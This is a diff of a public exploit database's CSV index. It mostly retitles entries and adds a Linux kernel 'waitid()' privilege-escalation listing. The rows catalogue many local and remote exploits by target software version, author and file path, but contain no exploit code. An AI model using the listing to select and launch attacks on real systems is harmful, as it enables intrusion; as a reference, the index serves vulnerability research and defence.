26996,platforms/aix/local/26996.txt,"IBM AIX 5.3 - GetShell and GetCommand File Enumeration",2005-12-30,xfocus,aix,local,0 @@ -8440,7 +8441,7 @@ id,file,description,date,author,platform,type,port 40768,platforms/linux/local/40768.sh,"Nginx (Debian-Based Distros + Gentoo) - 'logrotate' Privilege Escalation",2016-11-16,"Dawid Golunski",linux,local,0 29069,platforms/windows/local/29069.c,"Computer Associates Personal Firewall 9.0 - HIPS Driver 'kmxfw.sys' Privilege Escalation",2006-11-16,"Ruben Santamarta",windows,local,0 29070,platforms/windows/local/29070.c,"Computer Associates Personal Firewall 9.0 - HIPS Driver 'kmxstart.sys' Privilege Escalation",2006-11-16,"Ruben Santamarta",windows,local,0 -29102,platforms/openbsd/local/29102.c,"OpenBSD 3.9/4.0 - ld.so Local Environment Variable Clearing",2006-11-20,"Mark Dowd",openbsd,local,0 +29102,platforms/openbsd/local/29102.c,"OpenBSD 3.9/4.0 - 'ld.so' Local Environment Variable Clearing",2006-11-20,"Mark Dowd",openbsd,local,0 29125,platforms/windows/local/29125.txt,"Avira Internet Security - 'avipbb.sys' Filter Bypass / Privilege Escalation",2013-10-22,"Ahmad Moghimi",windows,local,0 34371,platforms/windows/local/34371.py,"BlazeDVD Pro Player 7.0 - '.plf' Buffer Overflow (SEH)",2014-08-20,metacom,windows,local,0 29190,platforms/osx/local/29190.txt,"Apple Mac OSX 10.4.x - Mach-O Binary Loading Integer Overflow",2006-11-26,LMH,osx,local,0 @@ -8585,7 +8586,7 @@ id,file,description,date,author,platform,type,port 32892,platforms/windows/local/32892.txt,"Microsoft Windows XP/2003 - RPCSS Service Isolation Privilege Escalation",2009-04-14,"Cesar Cerrudo",windows,local,0 32893,platforms/windows/local/32893.txt,"Microsoft Windows Vista/2008 - Thread Pool ACL Privilege Escalation",2009-04-14,"Cesar Cerrudo",windows,local,0 32901,platforms/php/local/32901.php,"PHP 5.2.9 cURL - 'Safe_mode' / 'open_basedir' Restriction Bypass Exploit",2009-04-10,"Maksymilian Arciemowicz",php,local,0 -32946,platforms/freebsd/local/32946.c,"FreeBSD 7.1 libc - Berkley DB Interface Uninitialized Memory Local Information Disclosure",2009-01-15,"Jaakko Heinonen",freebsd,local,0 +32946,platforms/freebsd/local/32946.c,"FreeBSD 7.1 - libc Berkley DB Interface Uninitialized Memory Local Information Disclosure",2009-01-15,"Jaakko Heinonen",freebsd,local,0 32947,platforms/linux/local/32947.txt,"DirectAdmin 1.33.3 - '/CMD_DB' Backup Action Insecure Temporary File Creation",2009-04-22,anonymous,linux,local,0 33012,platforms/windows/local/33012.c,"Microsoft Windows XP/2000/2003 - Desktop Wall Paper System Parameter Privilege Escalation",2009-02-02,Arkon,windows,local,0 33028,platforms/linux/local/33028.txt,"JRuby Sandbox 0.2.2 - Sandbox Escape",2014-04-25,joernchen,linux,local,0 @@ -8785,10 +8786,10 @@ id,file,description,date,author,platform,type,port 37543,platforms/linux/local/37543.c,"Linux Kernel 2.6.x - 'rds_recvmsg()' Local Information Disclosure",2012-07-26,"Jay Fenlason",linux,local,0 37631,platforms/linux/local/37631.c,"GNU glibc - Multiple Local Stack Buffer Overflow Vulnerabilities",2012-08-13,"Joseph S. Myer",linux,local,0 37657,platforms/windows/local/37657.txt,"Microsoft Word - Local Machine Zone Remote Code Execution (MS15-022)",2015-07-20,"Eduardo Braun Prado",windows,local,0 -37670,platforms/osx/local/37670.sh,"Apple Mac OSX 10.10 - DYLD_PRINT_TO_FILE Privilege Escalation",2015-07-22,"Stefan Esser",osx,local,0 +37670,platforms/osx/local/37670.sh,"Apple Mac OSX 10.10 - 'DYLD_PRINT_TO_FILE' Privilege Escalation",2015-07-22,"Stefan Esser",osx,local,0 37699,platforms/windows/local/37699.py,"Foxit Reader - '.png' Conversion Parsing tEXt Chunk Arbitrary Code Execution",2015-07-27,"Sascha Schirra",windows,local,0 37737,platforms/windows/local/37737.rb,"Heroes of Might and Magic III - '.h3m' Map file Buffer Overflow (Metasploit)",2015-08-07,Metasploit,windows,local,0 -37825,platforms/osx/local/37825.txt,"Apple Mac OSX 10.10.5 - XNU Privilege Escalation",2015-08-18,kpwn,osx,local,0 +37825,platforms/osx/local/37825.txt,"Apple Mac OSX 10.10.5 - 'XNU' Privilege Escalation",2015-08-18,kpwn,osx,local,0 37710,platforms/linux/local/37710.txt,"Sudo 1.8.14 (RHEL 5/6/7 / Ubuntu) - 'Sudoedit' Unauthorized Privilege Escalation",2015-07-28,"daniel svartman",linux,local,0 37716,platforms/windows/local/37716.c,"Heroes of Might and Magic III - Map Parsing Arbitrary Code Execution",2015-07-29,"John AAkerblom",windows,local,0 37722,platforms/lin_x86-64/local/37722.c,"Linux espfix64 - Nested NMIs Interrupting Privilege Escalation",2015-08-05,"Andrew Lutomirski",lin_x86-64,local,0 @@ -8849,7 +8850,7 @@ id,file,description,date,author,platform,type,port 38357,platforms/linux/local/38357.c,"rpi-update - Insecure Temporary File Handling / Security Bypass",2013-02-28,Technion,linux,local,0 38360,platforms/osx/local/38360.txt,"Dropbox < 3.3.x - OSX FinderLoadBundle Privilege Escalation",2015-09-30,cenobyte,osx,local,0 38362,platforms/windows/local/38362.py,"MakeSFX.exe 1.44 - Stack Buffer Overflow",2015-09-30,hyp3rlinx,windows,local,0 -38371,platforms/osx/local/38371.py,"Apple Mac OSX 10.9.5/10.10.5 - rsh/libmalloc Privilege Escalation",2015-10-01,rebel,osx,local,0 +38371,platforms/osx/local/38371.py,"Apple Mac OSX 10.9.5/10.10.5 - 'rsh/libmalloc' Privilege Escalation",2015-10-01,rebel,osx,local,0 38381,platforms/windows/local/38381.py,"WinRar < 5.30 Beta 4 - Settings Import Command Execution",2015-10-02,R-73eN,windows,local,0 38382,platforms/windows/local/38382.py,"ASX to MP3 Converter 1.82.50 - '.asx' Stack Overflow",2015-10-02,ex_ptr,windows,local,0 38390,platforms/linux/local/38390.c,"Linux Kernel 3.0 < 3.3.5 - 'CLONE_NEWUSER|CLONE_FS' Privilege Escalation",2013-03-13,"Sebastian Krahmer",linux,local,0 @@ -8865,7 +8866,7 @@ id,file,description,date,author,platform,type,port 38504,platforms/windows/local/38504.py,"HandyPassword 4.9.3 - Overwrite (SEH)",2015-10-21,Un_N0n,windows,local,0 38532,platforms/windows/local/38532.py,"Alreader 2.5 .fb2 - Based Stack Overflow (SEH) (ASLR + DEP Bypass)",2015-10-25,g00dv1n,windows,local,0 38533,platforms/windows/local/38533.c,"Microsoft Windows 10 - pcap Driver Privilege Escalation",2015-10-26,Rootkitsmm,windows,local,0 -38540,platforms/osx/local/38540.rb,"Apple Mac OSX 10.9.5/10.10.5 - rsh/libmalloc Privilege Escalation (Metasploit)",2015-10-27,Metasploit,osx,local,0 +38540,platforms/osx/local/38540.rb,"Apple Mac OSX 10.9.5/10.10.5 - 'rsh/libmalloc' Privilege Escalation (Metasploit)",2015-10-27,Metasploit,osx,local,0 38559,platforms/linux/local/38559.txt,"Linux Kernel 3.3.5 - 'b43' Wireless Driver Privilege Escalation",2013-06-07,"Kees Cook",linux,local,0 38576,platforms/aix/local/38576.sh,"AIX 7.1 - 'lquerylv' Privilege Escalation",2015-10-30,"S2 Crew",aix,local,0 38600,platforms/windows/local/38600.py,"Sam Spade 1.14 - Crawl website Buffer Overflow",2015-11-02,MandawCoder,windows,local,0 @@ -9003,7 +9004,7 @@ id,file,description,date,author,platform,type,port 40145,platforms/windows/local/40145.txt,"Rapid7 AppSpider 6.12 - Privilege Escalation",2016-07-25,LiquidWorm,windows,local,0 40118,platforms/windows/local/40118.txt,"Microsoft Internet Explorer 11 (Windows 10) - VBScript Memory Corruption (PoC) (MS16-051)",2016-06-22,"Brian Pak",windows,local,0 40132,platforms/windows/local/40132.txt,"Wowza Streaming Engine 4.5.0 - Privilege Escalation",2016-07-20,LiquidWorm,windows,local,0 -40141,platforms/bsd/local/40141.c,"NetBSD mail.local(8) - Privilege Escalation (NetBSD-SA2016-006)",2016-07-21,akat1,bsd,local,0 +40141,platforms/bsd/local/40141.c,"NetBSD - 'mail.local(8)' Privilege Escalation",2016-07-21,akat1,bsd,local,0 40148,platforms/windows/local/40148.py,"Mediacoder 0.8.43.5852 - '.m3u' (SEH)",2016-07-25,"Karn Ganeshen",windows,local,0 40151,platforms/windows/local/40151.py,"CoolPlayer+ Portable 2.19.6 - '.m3u' File Stack Overflow (Egghunter + ASLR Bypass)",2016-07-25,"Karn Ganeshen",windows,local,0 40164,platforms/multiple/local/40164.c,"VMware Virtual Machine Communication Interface (VMCI) - 'vmci.sys' (PoC)",2013-03-06,"Artem Shishkin",multiple,local,0 @@ -9213,9 +9214,9 @@ id,file,description,date,author,platform,type,port 41972,platforms/windows/local/41972.txt,"Gemalto SmartDiag Diagnosis Tool < 2.5 - Buffer Overflow (SEH)",2017-05-08,"Majid Alqabandi",windows,local,0 41971,platforms/windows/local/41971.py,"MediaCoder 0.8.48.5888 - Local Buffer Overflow (SEH)",2017-05-08,Muhann4d,windows,local,0 41973,platforms/linux/local/41973.txt,"Xen 64bit PV Guest - pagetable use-after-type-change Breakout",2017-05-08,"Google Security Research",linux,local,0 -41994,platforms/linux/local/41994.c,"Linux Kernel 4.8.0-41-generic (Ubuntu) - Packet Socket Local Privilege Escalation",2017-05-11,"Andrey Konovalov",linux,local,0 -41995,platforms/linux/local/41995.c,"Linux Kernel 3.11 < 4.8 0 - 'SO_SNDBUFFORCE' & 'SO_RCVBUFFORCE' Local Privilege Escalation",2017-03-22,"Andrey Konovalov",linux,local,0 -41999,platforms/linux/local/41999.txt,"Linux Kernel 3.x (Ubuntu 14.04 / Mint 17.3 / Fedora 22) - Double-free usb-midi SMEP Local Privilege Escalation",2016-02-22,"Andrey Konovalov",linux,local,0 +41994,platforms/linux/local/41994.c,"Linux Kernel 4.8.0-41-generic (Ubuntu) - Packet Socket Privilege Escalation",2017-05-11,"Andrey Konovalov",linux,local,0 +41995,platforms/linux/local/41995.c,"Linux Kernel 3.11 < 4.8 0 - 'SO_SNDBUFFORCE' / 'SO_RCVBUFFORCE' Privilege Escalation",2017-03-22,"Andrey Konovalov",linux,local,0 +41999,platforms/linux/local/41999.txt,"Linux Kernel 3.x (Ubuntu 14.04 / Mint 17.3 / Fedora 22) - Double-free usb-midi SMEP Privilege Escalation",2016-02-22,"Andrey Konovalov",linux,local,0 42000,platforms/windows/local/42000.txt,"Dive Assistant Template Builder 8.0 - XML External Entity Injection",2017-05-12,"Trent Gordon",windows,local,0 42020,platforms/windows/local/42020.cpp,"Microsoft Windows - COM Aggregate Marshaler/IRemUnknown2 Type Confusion Privilege Escalation",2017-05-17,"Google Security Research",windows,local,0 42045,platforms/linux/local/42045.c,"VMware Workstation for Linux 12.5.2 build-4638234 - ALSA Config Host Root Privilege Escalation",2017-05-22,"Google Security Research",linux,local,0 @@ -9243,9 +9244,9 @@ id,file,description,date,author,platform,type,port 42270,platforms/solaris_x86/local/42270.c,"Oracle Solaris 11.1/11.3 (RSH) - 'Stack Clash' Local Privilege Escalation",2017-06-28,"Qualys Corporation",solaris_x86,local,0 42271,platforms/openbsd/local/42271.c,"OpenBSD - 'at Stack Clash' Local Privilege Escalation",2017-06-28,"Qualys Corporation",openbsd,local,0 42273,platforms/lin_x86/local/42273.c,"Linux Kernel - 'offset2lib Stack Clash' Exploit",2017-06-28,"Qualys Corporation",lin_x86,local,0 -42274,platforms/lin_x86/local/42274.c,"Linux Kernel (Debian 7/8/9/10 / Fedora 23/24/25 / CentOS 5.3/5.11/6.0/6.8/7.2.1511) - 'ldso_hwcap Stack Clash' Local Privilege Escalation",2017-06-28,"Qualys Corporation",lin_x86,local,0 -42275,platforms/lin_x86-64/local/42275.c,"Linux Kernel (Debian 7.7/8.5/9.0 / Ubuntu 14.04.2/16.04.2/17.04 / Fedora 22/25 / CentOS 7.3.1611) - 'ldso_hwcap_64 Stack Clash' Local Privilege Escalation",2017-06-28,"Qualys Corporation",lin_x86-64,local,0 -42276,platforms/lin_x86/local/42276.c,"Linux Kernel (Debian 9/10 / Ubuntu 14.04.5/16.04.2/17.04 / Fedora 23/24/25) - 'ldso_dynamic Stack Clash' Local Privilege Escalation",2017-06-28,"Qualys Corporation",lin_x86,local,0 +42274,platforms/lin_x86/local/42274.c,"Linux Kernel (Debian 7/8/9/10 / Fedora 23/24/25 / CentOS 5.3/5.11/6.0/6.8/7.2.1511) - 'ldso_hwcap Stack Clash' Privilege Escalation",2017-06-28,"Qualys Corporation",lin_x86,local,0 +42275,platforms/lin_x86-64/local/42275.c,"Linux Kernel (Debian 7.7/8.5/9.0 / Ubuntu 14.04.2/16.04.2/17.04 / Fedora 22/25 / CentOS 7.3.1611) - 'ldso_hwcap_64 Stack Clash' Privilege Escalation",2017-06-28,"Qualys Corporation",lin_x86-64,local,0 +42276,platforms/lin_x86/local/42276.c,"Linux Kernel (Debian 9/10 / Ubuntu 14.04.5/16.04.2/17.04 / Fedora 23/24/25) - 'ldso_dynamic Stack Clash' Privilege Escalation",2017-06-28,"Qualys Corporation",lin_x86,local,0 42542,platforms/windows/local/42542.txt,"Automated Logic WebCTRL 6.5 - Privilege Escalation",2017-08-22,LiquidWorm,windows,local,0 42310,platforms/windows/local/42310.txt,"Pelco VideoXpert 1.12.105 - Privilege Escalation",2017-07-10,LiquidWorm,windows,local,0 42319,platforms/windows/local/42319.txt,"CyberArk Viewfinity 5.5.10.95 - Privilege Escalation",2017-07-13,geoda,windows,local,0 @@ -9304,6 +9305,7 @@ id,file,description,date,author,platform,type,port 43006,platforms/linux/local/43006.txt,"shadowsocks-libev 3.1.0 - Command Execution",2017-10-17,"X41 D-Sec GmbH",linux,local,8839 43007,platforms/linux/local/43007.txt,"Shadowsocks - Log File Command Execution",2017-10-17,"X41 D-Sec GmbH",linux,local,0 43017,platforms/windows/local/43017.txt,"Microsoft Game Definition File Editor 6.3.9600 - XML External Entity Injection",2017-10-19,hyp3rlinx,windows,local,0 +43029,platforms/linux/local/43029.c,"Linux Kernel 4.14.0-rc4+ - 'waitid()' Privilege Escalation",2017-10-22,"@XeR_0x2A and @chaign_c",linux,local,0 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80 5,platforms/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139 @@ -9483,7 +9485,7 @@ id,file,description,date,author,platform,type,port 404,platforms/linux/remote/404.pl,"PlaySms 0.7 - SQL Injection",2004-08-19,"Noam Rathaus",linux,remote,0 405,platforms/linux/remote/405.c,"XV 3.x - '.BMP' Parsing Local Buffer Overflow",2004-08-20,infamous41md,linux,remote,0 408,platforms/linux/remote/408.c,"Qt - '.bmp' Parsing Bug Heap Overflow",2004-08-21,infamous41md,linux,remote,0 -409,platforms/bsd/remote/409.c,"BSD TelnetD - Remote Command Execution (1)",2001-06-09,Teso,bsd,remote,23 +409,platforms/bsd/remote/409.c,"BSD - 'TelnetD' Remote Command Execution (1)",2001-06-09,Teso,bsd,remote,23 413,platforms/linux/remote/413.c,"MusicDaemon 0.0.3 - Remote Denial of Service / '/etc/shadow' Stealer (2)",2004-08-24,Tal0n,linux,remote,0 416,platforms/linux/remote/416.c,"Hafiye 1.0 - Remote Terminal Escape Sequence Injection",2004-08-25,"Serkan Akpolat",linux,remote,0 418,platforms/windows/remote/418.c,"Winamp 5.04 - '.wsz' Skin File Remote Code Execution",2004-08-25,"Petrol Designs",windows,remote,0 @@ -11715,7 +11717,7 @@ id,file,description,date,author,platform,type,port 18171,platforms/multiple/remote/18171.rb,"Java Applet Rhino Script Engine - Remote Code Execution (Metasploit)",2011-11-30,Metasploit,multiple,remote,0 18172,platforms/hardware/remote/18172.rb,"CTEK SkyRouter 4200/4300 - Command Execution (Metasploit)",2011-11-30,Metasploit,hardware,remote,0 18179,platforms/jsp/remote/18179.html,"IBM Lotus Domino Server Controller - Authentication Bypass",2011-11-30,"Alexey Sintsov",jsp,remote,0 -18181,platforms/freebsd/remote/18181.txt,"ftpd / ProFTPd (FreeBSD) - Remote Command Execution",2011-12-01,kingcope,freebsd,remote,0 +18181,platforms/freebsd/remote/18181.txt,"FreeBSD - 'ftpd / ProFTPd' Remote Command Execution",2011-12-01,kingcope,freebsd,remote,0 18182,platforms/windows/remote/18182.txt,"Serv-U FTP Server - Jail Break",2011-12-01,kingcope,windows,remote,0 18183,platforms/windows/remote/18183.rb,"AVID Media Composer Phonetic Indexer - Remote Stack Buffer Overflow (Metasploit)",2011-12-01,"Nick Freeman",windows,remote,0 18187,platforms/windows/remote/18187.c,"CoDeSys SCADA 2.3 - Remote Exploit",2011-12-01,"Celil Ünüver",windows,remote,0 @@ -11733,7 +11735,7 @@ id,file,description,date,author,platform,type,port 18365,platforms/windows/remote/18365.rb,"Microsoft Internet Explorer - JavaScript OnLoad Handler Remote Code Execution (MS05-054) (Metasploit)",2012-01-14,Metasploit,windows,remote,0 18367,platforms/windows/remote/18367.rb,"XAMPP - WebDAV PHP Upload (Metasploit)",2012-01-14,Metasploit,windows,remote,0 18368,platforms/linux/remote/18368.rb,"Linux BSD-derived Telnet Service Encryption Key ID - Buffer Overflow (Metasploit)",2012-01-14,Metasploit,linux,remote,0 -18369,platforms/bsd/remote/18369.rb,"FreeBSD Telnet Service - Encryption Key ID Buffer Overflow (Metasploit)",2012-01-14,Metasploit,bsd,remote,0 +18369,platforms/bsd/remote/18369.rb,"FreeBSD - Telnet Service Encryption Key ID Buffer Overflow (Metasploit)",2012-01-14,Metasploit,bsd,remote,0 18377,platforms/osx/remote/18377.rb,"Mozilla Firefox 3.6.16 (OSX) - mChannel Use-After-Free (Metasploit) (2)",2012-01-17,Metasploit,osx,remote,0 18381,platforms/windows/remote/18381.rb,"HP Easy Printer Care - XMLCacheMgr Class ActiveX Control Remote Code Execution (Metasploit)",2012-01-18,Metasploit,windows,remote,0 18382,platforms/windows/remote/18382.py,"Sysax Multi Server 5.50 - Create Folder Buffer Overflow",2012-01-18,"Craig Freyman",windows,remote,0 @@ -11834,7 +11836,7 @@ id,file,description,date,author,platform,type,port 19030,platforms/windows/remote/19030.rb,"Tom Sawyer Software GET Extension Factory - Remote Code Execution (Metasploit)",2012-06-10,Metasploit,windows,remote,0 19028,platforms/linux/remote/19028.txt,"Berkeley Sendmail 5.58 - Debug Exploit",1988-08-01,anonymous,linux,remote,0 19033,platforms/windows/remote/19033.txt,"Microsoft IIS 6.0/7.5 (+ PHP) - Multiple Vulnerabilities",2012-06-10,kingcope,windows,remote,0 -19039,platforms/bsd/remote/19039.txt,"BSD 4.2 fingerd - Buffer Overflow",1988-10-01,anonymous,bsd,remote,0 +19039,platforms/bsd/remote/19039.txt,"BSD 4.2 - 'fingerd' Buffer Overflow",1988-10-01,anonymous,bsd,remote,0 19040,platforms/solaris/remote/19040.txt,"SunView (SunOS 4.1.1) - selection_svc Exploit",1990-08-14,"Peter Shipley",solaris,remote,0 19044,platforms/solaris/remote/19044.txt,"SunOS 4.1.3 - LD_LIBRARY_PATH / LD_OPTIONS Exploit",1992-05-27,anonymous,solaris,remote,0 19047,platforms/aix/remote/19047.txt,"Stalker Internet Mail Server 1.6 - Buffer Overflow",2001-09-12,"David Luyer",aix,remote,0 @@ -11942,8 +11944,8 @@ id,file,description,date,author,platform,type,port 19468,platforms/windows/remote/19468.txt,"Microsoft Internet Explorer 5 - ActiveX 'Object for constructing type libraries for scriptlets'",1999-08-21,"Georgi Guninski",windows,remote,0 19475,platforms/linux/remote/19475.c,"ProFTPd 1.2 pre1/pre2/pre3/pre4/pre5 - Remote Buffer Overflow (1)",1999-08-17,"babcia padlina ltd",linux,remote,0 19476,platforms/linux/remote/19476.c,"ProFTPd 1.2 pre1/pre2/pre3/pre4/pre5 - Remote Buffer Overflow (2)",1999-08-27,anonymous,linux,remote,0 -19478,platforms/unix/remote/19478.c,"BSD/OS 3.1/4.0.1 / FreeBSD 3.0/3.1/3.2 / RedHat Linux 6.0 - amd Buffer Overflow (1)",1999-08-31,Taeho,unix,remote,0 -19479,platforms/unix/remote/19479.c,"BSD/OS 3.1/4.0.1 / FreeBSD 3.0/3.1/3.2 / RedHat Linux 6.0 - amd Buffer Overflow (2)",1999-08-30,c0nd0r,unix,remote,0 +19478,platforms/unix/remote/19478.c,"BSD/OS 3.1/4.0.1 / FreeBSD 3.0/3.1/3.2 / RedHat Linux 6.0 - 'amd' Buffer Overflow (1)",1999-08-31,Taeho,unix,remote,0 +19479,platforms/unix/remote/19479.c,"BSD/OS 3.1/4.0.1 / FreeBSD 3.0/3.1/3.2 / RedHat Linux 6.0 - 'amd' Buffer Overflow (2)",1999-08-30,c0nd0r,unix,remote,0 19484,platforms/windows/remote/19484.rb,"HP Data Protector - Create New Folder Buffer Overflow (Metasploit)",2012-07-01,Metasploit,windows,remote,3817 19486,platforms/windows/remote/19486.c,"Netscape Communicator 4.06/4.5/4.6/4.51/4.61 - EMBED Buffer Overflow",1999-09-02,"R00t Zer0",windows,remote,0 19487,platforms/windows/remote/19487.txt,"Microsoft Internet Explorer 4/5 - ActiveX 'Eyedog'",1999-08-21,"Shane Hird's",windows,remote,0 @@ -11957,7 +11959,7 @@ id,file,description,date,author,platform,type,port 19503,platforms/linux/remote/19503.txt,"ProFTPd 1.2 pre6 - 'snprintf' Remote Root Exploit",1999-09-17,"Tymm Twillman",linux,remote,0 19514,platforms/windows/remote/19514.txt,"Adobe Acrobat ActiveX Control 1.3.188 - ActiveX Buffer Overflow",1999-09-27,"Shane Hird",windows,remote,0 19515,platforms/windows/remote/19515.txt,"Microsoft Internet Explorer 4 (Windows 95/NT 4.0) - Setupctl ActiveX Control Buffer Overflow",1999-09-27,"Shane Hird",windows,remote,0 -19520,platforms/bsd/remote/19520.txt,"BSD TelnetD - Remote Command Execution (2)",2012-07-01,kingcope,bsd,remote,0 +19520,platforms/bsd/remote/19520.txt,"BSD - 'TelnetD' Remote Command Execution (2)",2012-07-01,kingcope,bsd,remote,0 19521,platforms/windows/remote/19521.txt,"Microsoft Internet Explorer 5.0/4.0.1 - hhopen OLE Control Buffer Overflow",1999-09-27,"Shane Hird",windows,remote,0 19522,platforms/linux/remote/19522.txt,"Linux Kernel 2.2 - Predictable TCP Initial Sequence Number",1999-09-27,"Stealth and S. Krahmer",linux,remote,0 19530,platforms/windows/remote/19530.txt,"Microsoft Internet Explorer 5 - Download Behaviour",1999-09-27,"Georgi Guninski",windows,remote,0 @@ -12399,7 +12401,7 @@ id,file,description,date,author,platform,type,port 20590,platforms/windows/remote/20590.txt,"Microsoft IIS 3.0/4.0 - Upgrade BDIR.HTR",1998-12-25,"rain forest puppy",windows,remote,0 20591,platforms/multiple/remote/20591.txt,"Netscape Enterprise Server 3.0/4.0 - 'Index' Disclosure",2001-01-24,"Security Research Team",multiple,remote,0 20592,platforms/jsp/remote/20592.txt,"Oracle 8.1.7 - JSP/JSPSQL Remote File Reading",2000-01-22,"Georgi Guninski",jsp,remote,0 -20593,platforms/freebsd/remote/20593.txt,"FreeBSD 3.x/4.x - ipfw Filtering Evasion",2001-01-23,"Aragon Gouveia",freebsd,remote,0 +20593,platforms/freebsd/remote/20593.txt,"FreeBSD 3.x/4.x - 'ipfw' Filtering Evasion",2001-01-23,"Aragon Gouveia",freebsd,remote,0 20594,platforms/unix/remote/20594.txt,"WU-FTPD 2.4.2/2.5/2.6 - Debug Mode Client Hostname Format String",2001-01-23,"Wu-ftpd team",unix,remote,0 20595,platforms/multiple/remote/20595.txt,"NCSA 1.3/1.4.x/1.5 / Apache httpd 0.8.11/0.8.14 - ScriptAlias Source Retrieval",1999-09-25,anonymous,multiple,remote,0 20597,platforms/linux/remote/20597.txt,"Majordomo 1.89/1.90 - lists Command Execution",1994-06-06,"Razvan Dragomirescu",linux,remote,0 @@ -12470,8 +12472,8 @@ id,file,description,date,author,platform,type,port 20726,platforms/windows/remote/20726.pl,"Gene6 BPFTP Server 2.0 - File Existence Disclosure",2001-04-03,"Rob Beck",windows,remote,0 20727,platforms/linux/remote/20727.c,"NTPd - Remote Buffer Overflow",2001-04-04,"babcia padlina ltd",linux,remote,0 20730,platforms/unix/remote/20730.c,"IPFilter 3.x - Fragment Rule Bypass",2001-04-09,"Thomas Lopatic",unix,remote,0 -20731,platforms/bsd/remote/20731.c,"FreeBSD 2.2-4.2 / NetBSD 1.2-4.5 / OpenBSD 2.x FTPd - 'glob()' Buffer Overflow",2001-04-14,"fish stiqz",bsd,remote,0 -20732,platforms/freebsd/remote/20732.pl,"FreeBSD 4.2-stable FTPd - 'glob()' Buffer Overflow Vulnerabilities",2001-04-16,"Elias Levy",freebsd,remote,0 +20731,platforms/bsd/remote/20731.c,"FreeBSD 2.2-4.2 / NetBSD 1.2-4.5 / OpenBSD 2.x - FTPd 'glob()' Buffer Overflow",2001-04-14,"fish stiqz",bsd,remote,0 +20732,platforms/freebsd/remote/20732.pl,"FreeBSD 4.2-stable - FTPd 'glob()' Buffer Overflow Vulnerabilities",2001-04-16,"Elias Levy",freebsd,remote,0 20733,platforms/openbsd/remote/20733.c,"OpenBSD 2.x < 2.8 FTPd - 'glob()' Buffer Overflow",2001-04-16,"Elias Levy",openbsd,remote,0 20738,platforms/multiple/remote/20738.txt,"PGP 5.x/6.x/7.0 - ASCII Armor Parser Arbitrary File Creation",2001-04-09,"Chris Anley",multiple,remote,0 20744,platforms/cgi/remote/20744.pl,"nph-maillist 3.0/3.5 - Arbitrary Code Execution",2001-04-10,Kanedaaa,cgi,remote,0 @@ -12571,7 +12573,7 @@ id,file,description,date,author,platform,type,port 20953,platforms/linux/remote/20953.c,"eXtremail 1.x/2.1 - Remote Format String (2)",2001-06-21,mu-b,linux,remote,0 20954,platforms/linux/remote/20954.pl,"eXtremail 1.x/2.1 - Remote Format String (3)",2006-10-06,mu-b,linux,remote,0 21017,platforms/linux/remote/21017.txt,"Squid Web Proxy 2.3 - Reverse Proxy",2001-07-18,"Paul Nasrat",linux,remote,0 -21018,platforms/unix/remote/21018.c,"Solaris 2.x/7.0/8 / IRIX 6.5.x / OpenBSD 2.x / NetBSD 1.x / Debian 3 / HP-UX 10 - TelnetD Buffer Overflow",2001-07-18,Dvorak,unix,remote,0 +21018,platforms/unix/remote/21018.c,"Solaris 2.x/7.0/8 / IRIX 6.5.x / OpenBSD 2.x / NetBSD 1.x / Debian 3 / HP-UX 10 - 'TelnetD' Buffer Overflow",2001-07-18,Dvorak,unix,remote,0 20966,platforms/solaris/remote/20966.c,"Netscape PublishingXPert 2.0/2.2/2.5 - Local File Reading",2000-04-06,"\x00\x00",solaris,remote,0 20968,platforms/unix/remote/20968.txt,"Samba 2.0.x/2.2 - Arbitrary File Creation",2001-06-23,"Michal Zalewski",unix,remote,0 20972,platforms/multiple/remote/20972.txt,"Icecast 1.1.x/1.3.x - Directory Traversal",2001-06-26,gollum,multiple,remote,0 @@ -12718,7 +12720,7 @@ id,file,description,date,author,platform,type,port 21355,platforms/jsp/remote/21355.txt,"Citrix NFuse 1.51/1.6 - Cross-Site Scripting",2002-03-27,"Eric Detoisien",jsp,remote,0 21361,platforms/windows/remote/21361.txt,"Microsoft Internet Explorer 5 - Cascading Style Sheet File Disclosure (MS02-023)",2002-04-02,"GreyMagic Software",windows,remote,0 21363,platforms/unix/remote/21363.c,"Icecast 1.x - AVLLib Buffer Overflow",2002-02-16,dizznutt,unix,remote,0 -21364,platforms/netbsd_x86/remote/21364.txt,"NetBSD 1.x TalkD - User Validation",2002-04-03,"Tekno pHReak",netbsd_x86,remote,0 +21364,platforms/netbsd_x86/remote/21364.txt,"NetBSD 1.x - 'TalkD' User Validation",2002-04-03,"Tekno pHReak",netbsd_x86,remote,0 21365,platforms/linux/remote/21365.txt,"phpGroupWare 0.9.13 - Debian Package Configuration",2002-04-03,"Matthias Jordan",linux,remote,0 21367,platforms/windows/remote/21367.txt,"Abyss Web Server 1.0 - File Disclosure",2002-04-07,"Jeremy Roberts",windows,remote,0 21368,platforms/windows/remote/21368.c,"Microsoft IIS 4.0/5.0 - Chunked Encoding Transfer Heap Overflow (1)",2002-04-10,"CHINANSL Security Team",windows,remote,0 @@ -15097,7 +15099,7 @@ id,file,description,date,author,platform,type,port 35420,platforms/hardware/remote/35420.txt,"IPUX Cube Type CS303C IP Camera - 'UltraMJCamX.ocx' ActiveX Stack Buffer Overflow",2014-12-02,LiquidWorm,hardware,remote,0 35421,platforms/hardware/remote/35421.txt,"IPUX CL5452/CL5132 IP Camera - 'UltraSVCamX.ocx' ActiveX Stack Buffer Overflow",2014-12-02,LiquidWorm,hardware,remote,0 35422,platforms/hardware/remote/35422.txt,"IPUX CS7522/CS2330/CS2030 IP Camera - 'UltraHVCamX.ocx' ActiveX Stack Buffer Overflow",2014-12-02,LiquidWorm,hardware,remote,0 -35427,platforms/bsd/remote/35427.py,"tnftp - clientside BSD Exploit",2014-12-02,dash,bsd,remote,0 +35427,platforms/bsd/remote/35427.py,"tnftp (FreeBSD 8/9/10) - 'tnftp' Client Eide Exploit",2014-12-02,dash,bsd,remote,0 35433,platforms/osx/remote/35433.pl,"Apple QuickTime 7.5 - '.m3u' Remote Stack Buffer Overflow",2011-03-09,KedAns-Dz,osx,remote,0 35434,platforms/windows/remote/35434.txt,"WebKit 1.2.x - Local Webpage Cross Domain Information Disclosure",2011-03-09,"Aaron Sigel",windows,remote,0 35441,platforms/multiple/remote/35441.rb,"Tincd - Authenticated Remote TCP Stack Buffer Overflow (Metasploit)",2014-12-02,Metasploit,multiple,remote,655 @@ -15917,6 +15919,10 @@ 